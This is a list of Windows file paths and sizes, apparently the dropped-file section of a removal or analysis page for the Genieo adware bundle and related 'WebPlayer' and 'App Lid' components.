      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devn.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs (220 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019063l.pfb (17026 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_sec.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Sol (2210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcolor.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2pcl.ps (2210 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Ult (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022024l.pfb (26706 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021023l.pfb (24930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_epsf.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1enc.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ce_e.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018032l.pfb (28130 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_setpd.ps (5522 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\s050000l.pfb (7778 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.VMS (1442 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xbm (605 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fntem.ps (818 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dpnxt.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciddc.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019043l.pfb (17754 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps1.ps (242 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showchar.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fonts.ps (11338 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskn.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059013l.pfb (27394 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wftopfa.ps (578 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\quit.ps (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskf.ps (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devpxl.ps (50 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcinfo.ps (4226 bytes)
      %Program Files% (x86)\App Lid\App Lid-bho64.dll (835 bytes)
      %Program Files% (x86)\App Lid\App Lid-bho.dll (671 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfA2A6.tmp\nsExec.dll (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\targetDefaultPortals.xml (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_tmp_template.txt (61 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories.txt (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xstream-1.3.1.jar (15168 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_datetime.stop (18 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.l4j.ini (115 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops2_stemmed.stop (416 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info_1_7.plist (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_1000_draft.txt (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\da_topwords.txt (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\tr_stops_stemmed.stop (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\servlet-api-2.5.jar (4992 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed.stop (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\heb_white_list.txt (8560 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\smtp.jar (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo_console.l4j.ini (118 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_common500cleaned.stop (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll (21216 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-core-1.0.1.jar (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\da_stops_stemmed.stop (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sac.jar (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_MergedStemmedEnglish.stop (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll (16424 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_topwords.txt (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jetty-webapp-7.3.0.v20110203.jar (32128 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_installing.png (345 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\rome-1.0.jar (8184 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_top_500_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe (825 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\es_top_1000_draft.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\nl_topwords.txt (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_top_500_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_numbers.stop (54 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xpp3_min-1.1.4c.jar (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sqlite-jdbc-3.7.2-windows.jar (20624 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\it_top_1000_draft.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed1.stop (559 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed_more.stop (583 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_top_500_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon_dev.png (632 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_morestops.stop (53 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\ini4j-0.5.1.jar (3312 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\modules-0.3.2.jar (9320 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\dd-plist.jar (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_nationalities.txt (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedList.dat (388 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-codec-1.6.jar (8560 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_outb.txt (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping_outb.txt (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-runtime-1.0.1.jar (9320 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-api-1.6.0.jar (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info.plist (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_misc.stop (38 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\cssparser-0.9.5.jar (9320 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_disabled.png (421 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_anabel.stop (319 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_date_time.stop (499 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultPortals.xml (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\log4j-1.2.15.jar (13368 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-logging-1.1.1.jar (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\ro_topwords.txt (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultFeeds.xml (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\genieoLogo24.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\readme.txt (610 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpcore-4.2.jar (8184 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-log4j12-1.6.0.jar (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\es_merged_stemmed.stop (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\es_topwords.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_numbers_and_currencies.stop (78 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\hu_topwords.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release_mac.properties (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\restfb-1.6.12.jar (10136 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_stops_stemmed2.stop (892 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpmime-4.2.jar (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed_new.stop (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sitelang.txt (150 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_new_items.png (343 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-collectionschema-1.0.1.jar (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\product_domains.txt (571 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_merged_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release.properties (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\tr_topwords.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\it_topwords.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\fr_lang.properties (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_merged_stemmed.stop (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\hu_stops_stemmed.stop (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_ToBeAddedToStop.stop (117 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed_v0.stop (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\engine.properties (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\engine.jar (65930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\zombie_icon.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_merged_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob_withadult.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_dev.properties (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sv_topwords.txt (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_date_time.stop (342 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed2.stop (347 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_top_500_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_tmp_template_all.txt (176 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fr_topwords.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\apache-mime4j-0.6.jar (12088 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fi_topwords.txt (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\JGoogleAnalyticsTracker-1.2.1-SNAPSHOT.jar (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\lucene-snowball-3.0.0.jar (4992 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isgenieoalive.dat (198 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories_multilingual.txt (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac.png (333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\en_top_1000_draft.txt (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\signpost-core-1.2.1.1.jar (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jdom.jar (5520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicit_content.dat (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon.png (723 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\en_lang.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D1.tmp (300445 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed.stop (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_more.stop (22 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicitList.dat (491 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\pt_topwords.txt (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\ru_lang.properties (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\sv_stops_stemmed.stop (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\default.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\de_topwords.txt (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedListByURL.dat (115 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D2.tmp\NSISdl.dll (30 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_25nouns_wiki.stop (169 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed3.stop (357 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_stops_stemmed2.stop (395 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\origin\ru_lang.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\preset_feeds.json (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\cluto_wrapper.properties (942 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\json.jar (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpclient-4.2.jar (14184 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\no_topwords.txt (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping.txt (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fi_stops_stemmed.stop (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\amazon_ad_api.jar (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_morestops.stop (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-api-1.0.1.jar (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_general.stop (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\fr_top_1000_draft.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_100_draft.txt (582 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_stops_stemmed.stop (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_explicit.stop (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob.txt (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jericho-html-3.1.jar (6360 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_articlebase.txt (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo.l4j.ini (115 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_stops_stemmed2.stop (473 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB000.tmp\System.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqAFFF.tmp (33533 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe (18368 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe (16903 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\readme.txt (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDOM_FAQ.htm (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Jericho HTML Parser.htm (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDIC_Plus_index.html (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail_SMTP.txt (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JettyNOTICE.txt (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe (18964 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail API Reference Implementation — Project Kenai.htm (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\fct.dll (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\License - jQuery JavaScript Library.htm (16 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\iehv.chm (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\KillProcDLL.dll (816 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe (3312 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\OpenSorcePackagesInUse.txt (295 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\conf\conf.ini (227 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Launch4j - Cross-platform Java executable wrapper.htm (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\readme.txt (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\oauth-signpost - Project Hosting on Google Code.htm (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\license.html (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\conf\conf.ini (21 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E4.tmp (32607 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\reallysimplehistory - Project Hosting on Google Code.htm (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\IE HistoryView Freeware Internet Explorer History Viewer.htm (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Apache log4j 1.2 - Project License.htm (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozilaHistoryViewbrowsers.htm (784 bytes)
